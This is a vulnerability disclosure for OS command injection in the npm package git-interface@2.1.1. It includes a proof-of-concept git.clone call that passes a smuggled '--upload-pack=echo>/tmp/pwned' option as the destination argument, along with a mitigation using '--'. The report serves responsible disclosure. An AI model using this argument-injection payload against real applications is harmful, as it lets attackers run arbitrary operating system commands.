Command Injection vulnerability in git-interface@2.1.1

git-interface describes itself as a Interface to work with a git repository in node.js

Resources:

• Project's GitHub source code: https://github.com/yarkeev/git-interface
• Project's npm package: https://www.npmjs.com/package/git-interface

I'm reporting an OS Command Injection vulnerability in git-interface npm package. The API may be abused if user input is able to provide a valid directory on disk and supply the destination directory to clone a repository too.

Proof of Concept exploit

Install git-interface@2.1.1 which is the latest.

Run the following code, with the following precondition, in which the /tmp/new directory needs to exist (doesn't need to be a .git initialized directory though), and so, you could provide a predictable path like say /usr/src:

const { Git } = require('git-interface');

const git = new Git({
    dir: '/tmp/new' //default path is current directory
});

git.clone('file:///tmp/new', '--upload-pack=echo>/tmp/pwned');

Observe a new file created: /tmp/pwned

Mitigation suggestions

Use the shell -- notation as a suffix of the supported command-line arguments (if at all), to then make sure that input passed to the git command is positional arguments rather than command-line arguments. For example: git clone -- <path> <destination> would prevent path and destination from being interpreted as command-line arguments for the git command.

Author

Liran Tal

Impact

If both are provided by user input, then the use of a --upload-pack command-line argument feature of git is also supported for git clone, which would then allow for any operating system command to be spawned by the attacker.